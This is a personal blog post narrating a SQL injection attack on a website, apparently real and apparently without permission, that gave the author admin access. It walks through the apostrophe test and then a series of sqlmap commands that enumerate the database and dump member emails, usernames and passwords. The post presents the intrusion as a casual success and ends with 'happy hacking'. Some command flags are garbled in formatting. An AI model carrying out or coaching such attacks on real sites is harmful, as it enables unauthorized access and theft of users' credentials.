Search
  • Aditya Anand

How I gained admin level access to a website?

It’s been some time since I tried gaining admin level access for any website. Today after a few days of chilling around and watching t.v. series I thought it was time to get back into the groove.

To gain admin level of access for any website the only way is to carry out a phishing attack, a key-logger attack or maybe a SQL attack. So, I tried to carry out a SQL injection attack on a website to obtain total admin access and boy was I successful?


Let’s dig in!

I started my attack on the website example.com/list.php?id=1, as it has the id parameter chances are it was more prone to SQL injection attacks. To check whether the website was vulnerable to SQL attack or not, I replaced the number “1” in the parameter and inserted an apostrophe “ ‘ ” in its place. A particular error was displayed when the website completed loading.

Now as soon as I got this error back from the server I knew there was a high chance that the server was vulnerable to SQL attacks. So, I opened up sqlmap to carry out the SQL attack.


The attack begins!

So, I started to check if the SQL vulnerability is exploitable or not using sqlmap and went ahead and launched the attack

sqlmap -u http://example.com/list.php?artist=1- -no-cast - -dbms=mysql - - dbs

And I was presented with the following output.

As soon as I got the above message I knew I had hit the jackpot. I proceeded ahead with my hack where I tried to get the information out of the first database.

sqlmap -u http://example.com/list.php?artist=1- -no-cast - -dbms=mysql -D da******ak - -tables

And I was presented with the following outputs.

Now in the first look I didn’t see anything interesting as most of the stuff was available on the website anyways. Then my eyes went on the table column “member”. I went ahead with the attack to figure out the detail of the columns inside the member table.

sqlmap -u http://example.com/list.php?artist=1- -no-cast — -dbms=mysql -D da******ak - -T member - -columns

And I got the following output.

Then I went ahead to find out the details that was presented inside the member table.

sqlmap -u http://example.com/list.php?artist=1- -no-cast - -dbms=mysql -D da******ak -T member -C member_email, member_fullname, member_password, member_user - -dump

As soon as I entered the above command I got the following details of the admin account which later on provided with control of the entire website and its contents.


Moral

SQL injection is a very dangerous attack that if carried out on a website can be extremely dangerous as it gives admin level access to the attacker. This allows the hacker to manipulate the contents of the website enabling to deface the website or using it for phishing purposes or even enable different scripts on the website according to hid needs.


If you enjoyed it please do clap and happy hacking!

Twitter : twitter.com/aditya12anand

LinkedIn : linkedin.com/in/aditya12anand/

E-mail : [email protected]

31 views
Wooden Hut

Feel free to connect!

  • LinkedIn Social Icon
  • Twitter Social Icon
  • Unknown_2

Created by Aditya Anand